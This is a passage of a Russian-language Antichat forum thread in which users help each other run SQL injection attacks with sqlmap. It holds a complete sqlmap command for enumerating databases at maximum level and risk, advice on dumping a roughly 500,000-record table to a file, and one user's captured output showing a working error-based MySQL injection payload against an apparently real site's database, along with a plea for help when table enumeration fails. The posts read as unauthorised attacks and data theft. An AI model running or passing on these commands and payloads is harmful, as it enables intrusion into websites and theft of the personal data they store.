HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1651  
Старый 20.01.2017, 11:26
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

./sqlmap.py -u http://site.ru/ --data="input1=admin@admin.ru" -p input1 --dbs --level 5 --risk 3 --threads 10 --hex
 
Ответить с цитированием

  #1652  
Старый 20.01.2017, 16:43
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами: 4946006

Репутация: 0
По умолчанию

Цитата:
Сообщение от ms13  

Ага, а что говорит...?
Ты извини, я тут приболел немного - гриппую, и, видимо, от этого мои телепатические способности угасли резко...
что то да... потерял я сноровку с задачей нормальных вопросов, сорян )
 
Ответить с цитированием

  #1653  
Старый 20.01.2017, 16:44
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами: 4946006

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  

./sqlmap.py -u
http://site.ru/
--data="input1=
admin@admin.ru
" -p input1 --dbs --level 5 --risk 3 --threads 10 --hex
как боженька, брагодарность
 
Ответить с цитированием

  #1654  
Старый 20.01.2017, 18:00
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами: 4946006

Репутация: 0
По умолчанию

есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль
 
Ответить с цитированием

  #1655  
Старый 20.01.2017, 18:14
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от foozzione  

есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль
Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры!
 
Ответить с цитированием

  #1656  
Старый 20.01.2017, 18:22
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами: 4946006

Репутация: 0
По умолчанию

Цитата:
Сообщение от ms13  

Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры!
то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?
 
Ответить с цитированием

  #1657  
Старый 20.01.2017, 18:30
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от foozzione  

то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?
Код:
--where=DUMPWHERE   Use WHERE condition while table dumping
--dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
 
Ответить с цитированием

  #1658  
Старый 20.01.2017, 18:31
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от t0ma5  

.
Та по-моему кто-то морочит голову...
 
Ответить с цитированием

  #1659  
Старый 20.01.2017, 20:47
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Цитата:
Сообщение от foozzione  

есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль
--dump-format=HTML --where=С:\
 
Ответить с цитированием

  #1660  
Старый 20.01.2017, 20:48
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Код:
Parameter: #1* ((custom) POST)
  Type: error-based
  Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
---
[19:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.3
back-end DBMS: MySQL >= 5.1
[19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
[19:45:22] [WARNING] the SQL query provided does not return any output
[19:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
Пробывал и no-cast и --hex не помгает
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.